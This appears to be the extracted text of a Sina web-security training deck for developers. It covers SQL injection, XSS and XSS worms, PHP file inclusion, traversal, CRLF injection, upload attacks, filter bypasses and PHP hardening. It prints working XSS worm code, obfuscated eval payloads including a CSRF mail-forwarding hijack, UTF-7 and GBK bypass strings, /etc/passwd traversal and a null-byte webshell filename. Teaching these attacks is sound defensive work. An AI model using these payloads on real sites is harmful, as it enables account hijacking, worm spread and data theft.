新浪web安全培训PPT学习课件.ppt

1、Click to edit Master title style,Click to edit Master text styles,Second level,Third level,Fourth level,Fifth level,P,内容简介,1.,知己知彼,百战不殆,2.,解析黑客手中的利器,3.,捍卫代码城堡,4.,剑走偏锋,5.,惊栗后的深思,6.,双剑合壁,新浪,WEB,安全培训,ver.2,Page,1,互联网攻击趋势,(,统计来自,computer.org,),脚本安全编程重要性,Page,2,脚本安全编程重要性,1.,知己知彼，百战不殆,Page,3,传统攻击流程,Page,4

2、WEB,攻击流程,Page,5,WEB,攻击流程,Page,6,2.,解析黑客手中的利器,Page,7,黑客攻击技术曝光,一、脚本黑客的瑞士军刀,-SQL,注入攻击,1.,猜解出数据库中的敏感信息,2.,如果连接权限高的话会得到文件操作权限,(load_file,into outfile),3.,根据数据库特性执行系统命令,Page,8,SQL,注入利用的是参数传递的时候过滤不严时用参数组合成正确的,SQL,语句来执行操作的技术。,简单的理解为：涉及进入,SQL,语句操作的变量没有过滤输入与转义输出,实例,-,夜猫软件下载系统,(,攻击与修复,),10.210.128.58/ymdown/s

3、how.php?id=1,黑客攻击技术曝光,Page,9,黑客攻击技术曝光,二、暗夜中舞动的精灵,-XSS,跨站脚本攻击,1.,进行会话劫持,2.CSRF,3.XSS WORM,4.,社会工程攻击、钓鱼、拒绝服务,5.,涂鸦页面,Page,10,XSS,又叫,CSS(Cross Site Script),，跨站脚本攻击。它指的是恶意攻击者往,Web,页面里插入恶意,html,代码,(,恶意,JS,代码,),，当用户浏览该页之时，嵌入其中,Web,里面的,html,代码,(,恶意,JS,代码,),会被执行，从而达到恶意用户的特殊目的。,输入一些数据需要在页面中显示出来，但是没有对这段数据做过滤输

4、入或者转义输出。,黑客攻击技术曝光,Page,11,xss,特点,继承浏览器权限,社会工程，被动攻击,影响广泛,(,只要浏览器支持,JavaScript),隐蔽，难以察觉,XSS,可能出现在哪？,1.HTML,标签外部,2.HTML,标签内部,(,属性、事件,),3.,输入到,javascript,代码,黑客攻击技术曝光,Page,12,黑客攻击技术曝光,WEB,安全新挑战,-XSS WORM,两段真实的,XSS WROM,统计数据,Page,13,百度,XSS,蠕虫攻击统计,黑客攻击技术曝光,Page,14,新浪博客,v5.0,蠕虫,var blogtitle=I OwNed youR Bl

5、oG,var blogbody=YourE mY fOOd.,蠕虫传播主体,不要构造这里,var xmlhttp=new ActiveXObject(Msxml2.XMLHTTP.3.0);,xmlhttp.open(GET,/admin/article/article_add.php,false);,xmlhttp.send();,var xss=xmlhttp.responseText;,token=xss.indexOf(vtoken);,if(token0),vtoken=xss.substr(token+15,32);,xmlhttp.open(post,/admin/article

6、/article_post.php,false);,xmlhttp.setRequestHeader(Content-Type,application/x-www-form-urlencoded);,xmlhttp.send(album=,var suss=xmlhttp.responseText;,send=suss.indexOf(06001);,if(send0),/alert(,感染成功,:);,document.location=else,alert(,感染失败,:();,黑客攻击技术曝光,Page,15,新浪空间 好友纸条群发蠕虫,-,获取,cookie,中的,uid-,cooki

7、e=unescape(request(cookie),cflag=Instr(cookie,nick=),dflag=Instr(cookie,);),省略,.,-,遍历好友数,-,for i=1 to 500,-,得到此,uid,的好友,-,url=&uid&page=&i&pagesize=1,xml.open GET,url,False,xml.send,htmlcon=b2bstr(xml.responsebody),-,提取好友,uid-,aflag=Instr(htmlcon,record:uid:),bflag=InStr(htmlcon,ftype),If aflag 0 An

8、d bflag 0 Then,okflag=Replace(Replace(mid(htmlcon,aflag,bflag),record:uid:,),),Else,-,超过最大好友数就中断,-,exit for,End If,-playload-,Response.Write,“,next,黑客攻击技术曝光,Page,16,永无止境的斗争,-XSS,过滤,&,突破,Baidu XSS,过滤绕过,aevilmask:,ex/*,exp/*/ression,*/pression,Sina XSS,过滤绕过,(input),code:,黑客攻击技术曝光,Page,17,新浪圈子,-Html,标签

9、内部进攻,黑客攻击技术曝光,Page,18,仔细分析该处也进行了敏感字符的过滤，比如,javascript,，,TAB,字元，,“,),等，但是经过测试发现这种过滤非常容易绕过，例如：,JaVaScrIpT:eval(unescape(xmlhttp%3Dnew%20ActiveXObject%28%22Msxml2.XMLHTTP.3.0%22%29%3Bxmlhttp.open%28%22GET%22%2C%22/g33k/bbs/topic/tid%3D13037271%22%2Cfalse%29%3Bxmlhttp.send%28%29%3Balert%28xmlhttp.respon

10、seText%29%3B);,黑客攻击技术曝光,Page,19,被污染的页面代码：,aaa,黑客攻击技术曝光,Page,20,新浪,VIP,邮箱,CSRF,攻击,IMG SRC=,javascript:eval(unescape(xmlhttp%3Dnew%20ActiveXObject%28%22Msxml2.XMLHTTP.3.0%22%29%3Bxmlhttp.open%28%22GET%22%2C%22/classic/setforward.php%3Foptype%3D1%26is_open%3D1%26Forward_To%3Dmengzhuo%26Forward_Save%3Do

11、n%22%2Cfalse%29%3Bxmlhttp.send%28%29%3Bvar%20a%3D%28xmlhttp.responseText%29%3Bdocument.write%28%22I%20Miss%20You%20%20from%20FengGou%20%3A%29%22%29%3B);,黑客攻击技术曝光,Page,21,代码分析,javascript:eval(unescape(xmlhttp=new ActiveXObject(Msxml2.XMLHTTP.3.0);xmlhttp.open(GET,/classic/setforward.php?optype=1,黑客攻击

12、技术曝光,Page,22,黑客攻击技术曝光,XSS,重组攻击,先进后执行,/*,*/(,hi,);/*,*/alert/*,/*,Page,23,黑客攻击技术曝光,三、千里之堤，毁于蚁穴,-PHP,文件包含漏洞,服务器通过,php,的特性（函数）去包含任意文件时，由于要包含的这个文件来源过滤不严，从而可去包含一个恶意文件，而我们可以构造这个恶意文件来达到攻击的目的。,Page,24,黑客攻击技术曝光,常见的攻击手法,1.,包含本地任意文件,(,读取、执行,),2.,包含远程任意文件,(,执行,),3.,直接执行系统命令,(php:/input),本地包含,&,远程包含,Page,25,黑客攻击

13、技术曝光,文件包含,$file=$_GETfile;,include($file);,include(/config/.$file);,路径包含,$path=$_GETpath;,include($path./config.php);,Page,26,黑客攻击技术曝光,Page,27,黑客攻击技术曝光,Page,28,黑客攻击技术曝光,四、一切尽在不言中,-,目录遍历,1.,查看当前以及其他目录结构与其文件,2.,危害目的由不正当使用的函数决定,3.,危害升级，,CRLF,注入。,Page,29,Vuln Code:,$fp=fopen($url,r);,fpassthru($fp);,黑客攻

14、击技术曝光,Page,30,四又,1/2,、文件名操作函数引发的血案,CRLF,PHP,的,fopen(),file(),及其它函数存在一个缺陷，即用户随意地添加额外,HTTP,报头信息到,HTTP,请求数据包中。攻击者可以利用此缺陷绕过服务器的安全限制，进行非法访问。在某些情况下，这个缺陷甚至可以打开任意的网络连接，在代理端执行,PHP,脚本和打开邮件转发。,黑客攻击技术曝光,Page,31,doc.php?url=,http%3A%2F%2F%3A25%2F+HTTP/1.0%0D%0AHELO+%0D%0AMAIL+FROM%3A%3Cmengzhuo%3E%0D%0ARCPT+TO%3

15、A%3Cxxx%3E%0D%0ADATA%0D%0ACRLF+is+here%0D%0A.%0D%0AQUIT%0D%0A%0D%0A,url=:25/+HTTP/1.0,HELO+,MAIL+FROM:,RCPT+TO:,DATA,CRLF+is+here,.,QUIT,黑客攻击技术曝光,Page,32,GET/HTTP/1.0HELO MAIL FROM:RCPT TO:DATACRLF is here.QUITHTTP/1.0Host:25,黑客攻击技术曝光,Page,33,Warning:fopen(.RCPT TO:DATA CRLF is here.QUIT)function.fo

16、pen:failed to open stream:HTTP request failed!,220 staff-Server ESMTP(Sun Java System Messaging Server 6.2-3.04(built Jul 15 2005),in/opt/lampp/htdocs/doc.php on line 3,虽然测试由于一些原因失败，但是已经证明了攻击的存在性,黑客攻击技术曝光,Page,34,黑客攻击技术曝光,五、飞向光明之巅,-,文件上传攻击,1.,直接获取,webshell,2.WEB,系统瞬间沦陷，直接威胁服务器安全,Page,35,黑客攻击技术曝光,恶意,

17、PHP,文件上传方法,1.,精心构造后缀,(php3,PhP,php.),2.,构造文件类型,Content-Type,3.,截断程序流程,(shell.php%00.jpg),4.,服务器解析缺陷,(test.php.rar),Page,36,黑客攻击技术曝光,Page,37,黑客攻击技术曝光,危险的本地,JS,检查,function isAllowedAttach(sFile),var sUploadImagesExt=.jpg.gif.png;,var sExt=sFile.match(/.*$/);,if(sExt),sExt=sExt0.toLowerCase();,else,if(

18、isAllowedAttach(file),show_error(,上传图片格式不正确,upinfo);,return false;,Page,38,黑客攻击技术曝光,六、没有硝烟的战争,-,黑客攻击的艺术,1.,淘金,(html,js,注释,备份文件,服务器报错信息,),2.,猜测文件与目录,3.,其他人留下的漏洞,4.,社会工程,5.0,day,6.,Page,39,真的这么简单吗？,在保证代码安全的前提下还要有风险对抗意识。,如果攻击者已经得逞，如何将损失、数据泄露、权限流失保证到最低限度。,黑客攻击技术曝光,Page,40,3.,捍卫代码城堡,Page,41,捍卫代码城堡,代码安全的

19、本质,-,恶意数据来自哪里？,1.,显示变量输入,$_GET,$_POST,$_COOKIE,$_SESSION,$_SERVER,.,Page,42,2.,隐式输入,来自于数据库,来自于配置文件,来自于缓存文件,.,捍卫代码城堡,Page,43,捍卫代码城堡,什么是敏感字符,?,SQL,注入,:id=1 and 1=1,id=1 and 1=2 union select 1,2,3,.,XSS:alert(),“,img src=#onerror=javascript,Include:vuln.php?path=./././etc/passwd,vuln.php?path=xxx/s.jpg

20、3f,Page,44,捍卫代码城堡,由此可见，敏感字符没有固定的形式与样子，取决于黑客攻击的目标的特性,.,对于,SQL,注入，过滤单引号,(,字符型,),，整形处理,(,数字型,),，与一些常用,SQL,关键字,(,select,update,and,or.),，,那将对,SQL,注入技术给予致命的打击！,过滤,，那么对于防范,html,标签外的,XSS,攻击可以说是彻底的。,Page,45,捍卫代码城堡,SQL,注入过滤方法,常用变量字符替换函数,str_replace(),字符转义函数,addslashes(),常用数字判断函数,is_numeric(),is_int().,Page,

21、46,捍卫代码城堡,XSS,跨站攻击解决方法,XSS,是输出到页面的内容，如果仍然过滤会打乱用户无意提交的敏感字符组成的文章，所以这里推荐转义,HTML,转义函数,:htmlentities(),htmlspecialchars(),会把,转义成,这样显示的内容不变,而且恶意标签已经失去意义,Page,47,捍卫代码城堡,但是！切记！,XSS,没有我们想象的简单，,XSS,不仅仅存在与,html,中，它可能存在与,CSS,中，错误的,HTTP,头中，,cookies,中，,Flash,中，甚至是一张图片中,.,Page,48,捍卫代码城堡,Page,49,捍卫代码城堡,Its a Good i

22、dea,局限法,select name,pass from user where uid=$id;,看上面的例子，将用户的输入局限在一对单引号或者双引号中,然后过滤掉单引号和双引号,防止用户截断,Page,50,捍卫代码城堡,当然，,WEB,安全也不仅仅是过滤，严谨的逻辑思维更重要，看一个案例,新浪房产,:,POST/yh1/zhuce/mebermanage.php HTTP/1.1,省略,HTTP,头信息,mbflag2=2&mebname=admin&mbpwd=123456&mbpwd2=123456&mbemail=xss&Submit3=%CC%E1%BD%BB,Page,51,捍

23、卫代码城堡,文件包含,文件操作类漏洞的解决,1.,控制本地读取的路径,(,小心,./,进行目录跳出,),2.,控制远程读取的路径,(,xxx/xxx),3.,最根本还是控制文件名变量的形态！,Page,52,捍卫代码城堡,利用,PHP,本身对抗文件操作进攻,allow_url_fopen=Off,(,禁止打开远程文件链接,),allow_url_include=Off,(,禁止远程包含文件,),open_basedir=/opt/www,(,禁止指定目录外的文件操作,),safe_mode=On,(PHP,将检查当前脚本的拥有者是否和被操作的文件的拥有者相同,),Page,53,捍卫代码城堡,

24、利用,PHP,本身对抗命令执行进攻,disable_functions=system(),passthru(),(,该指令接受一个用逗号分隔的函数名列表，以禁用特定的函数,),如果你的程序不需要使用这些函数请禁掉，因为,webshell,会经常使用,Page,54,捍卫代码城堡,利用,PHP,本身对抗字符注入进攻,magic_quotes_gpc=On,(,检查来自,GET/POST/Cookie,的数据并自动转义敏感字符,),Its very cool,Page,55,转义,VS,过滤,选择那个？,转义后的敏感字符会导致程序处理流程出错，最后将错误显示到页面。,捍卫代码城堡,Page,56,

25、捍卫代码城堡,守口如瓶,-,不能说的秘密,php,执行错误报错的信息一些人看起来不算什么，但是对于一个黑客来说，也许是罪恶的开始。,1.,暴露数据库结构,2.,暴露物理路径,Page,57,捍卫代码城堡,Warning:include()function.include:Failed opening for inclusion(include_path=.:/opt/lampp/lib/php)in/opt/lampp/htdocs/path.php on line 3,display_errors=Off,(,关闭错误回显,),Page,58,4.,剑走偏锋,Page,59,剑走偏锋,不得不

26、承认，在这个网络安全乱世，黑客平民化的网络时代中，安全已经远远没有想象中的那么简单。,攻击者的目光已经不在那些没有安全处理的变量上，而是向这些正常程序函数或安全处理机制下了毒手。,黑客的必杀技？！,Page,60,剑走偏锋,不想突破的黑客不是好黑客,-GPC,的绕过,在,PHP5,中，,$_SERVER,变量不再受其保护，导致攻击者可以把单引号、双引号和空字元带入程序,$_SERVERHTTP_X_FORWARDED_FOR,$_SERVERHTTP_REFERER,$_SERVERQUERY_STRING,Page,61,剑走偏锋,GPC,的绕过请求,GET/gpc.php?a=sina H

27、TTP/1.0,Accept:*/*,Accept-Language:zh-cn,Accept-Encoding:gzip,deflate,Host:10.210.128.58,Connection:Keep-Alive,X-Forwarded-For:Sina,Referer:Sina,Page,62,剑走偏锋,Page,63,剑走偏锋,魔高一尺,-,幽灵般的,XSS,绕过技术,htmlentities(),真的是标签,XSS,终结者？,xss.php?xss=%2bADw-SCRIPT%2bAD4-alert(/xss%20is%20here!/)%2bADw-%2fSCRIPT%2bAD

28、4-,utf7+urlencode and other,.,Page,64,剑走偏锋,道高一丈,-,毛骨悚然,SQL,注入绕过技术,Addslashes(),真的是字符型,SQL,注入的终结者？,注意,user,的值,:,SELECT*FROM user WHERE user=,籠,sinaadmin AND pass=sinaadmin,GBK,中,0 xbb27,不是合法的双字节字符,(,中文,),0 x27,相当于,(),被转义成,0 xbb5c27(/),但是,0 xbb5c,是一个合法的中文字符，由此注入了一个,0 x27(),。,Page,65,P,P,P,Page,69,剑走偏锋

29、十面埋伏,-preg_replace(),中的陷阱,+/e,执行漏洞,Preg_repace,当第一个参数的正则表达式参数有,e,符号的时候，第二个参数的字符串当做,PHP,代码执行。,Page,70,剑走偏锋,变量中转攻击,通过表达式提取,preg_repace(),的第三个参数,通过,n,中转提交的第三个参数里的,PHP,代码。,Page,71,黑客们的武林绝技当然不只是这些，这里举例的仅仅是凤毛麟角而已，还有更多已经公布的，更多未公布的，令我们防不胜防的招数在黑暗中向我们挑战！,剑走偏锋,Page,72,5.,惊栗后的深思,Page,73,问题为什么会存在？,1.,来自开发者本身,对安

30、全认识的不足,逻辑不严谨,编写失误,思维盲区,2.,来自于语言本身,配置错误,函数的安全隐患,安全措施的绕过,惊栗后的深思,Page,74,要对你的工具有充分的了解,1.,了解语言特性,语言环境等基本配置,各种选项的功能与缺陷,自带函数的深刻理解与灵活运用,2.,了解相关产品的特性,web,服务器的配置与安全选项,数据库的操作与权限划分,(SQL,注入攻击灵巧的利用了,MYSQLMSSQL,等的特性,),惊栗后的深思,Page,75,惊栗后的深思,安全编程五个要素,1.,对你所使用的语言有充分的了解,2.,坚信任何用户的输入都是不安全的,3.,过滤数据远远没有限制输入安全,4.,最少的服务,+

31、最小的权限,=,最大的安全,5.,保持清晰的思维,Page,76,6.,双剑合壁,Page,77,在繁重的程序开发工作中，忽然要对安全如此的重视，必然使工作更加繁重，而且还会发生更多的错误。,推荐几款漏洞自动检测工具（白盒、黑盒）,优秀的工具不仅仅是举例这些,双剑合壁,Page,78,双剑合壁,宝刀未老,-grep,Page,79,双剑合壁,精灵古怪,-PHP Xcode,Page,80,双剑合壁,短小精悍,-SuiGenchi(0 x000000),Page,81,大家闺秀,-ratproxy(google,开源,xss,检测代理,),双剑合壁,Page,82,东邪,-WebInspect,双剑合壁,Page,83,西毒,-Acunetix Web Vulnerability Scanner,双剑合壁,Page,84,工具诚可贵，技术价更高！,工具仅仅是工具，毕竟最理解程序的，还是赋予代码灵魂的程序员。,双剑合壁,Page,85,谢谢！,新浪,WEB,安全培训,ver.2,Page,86,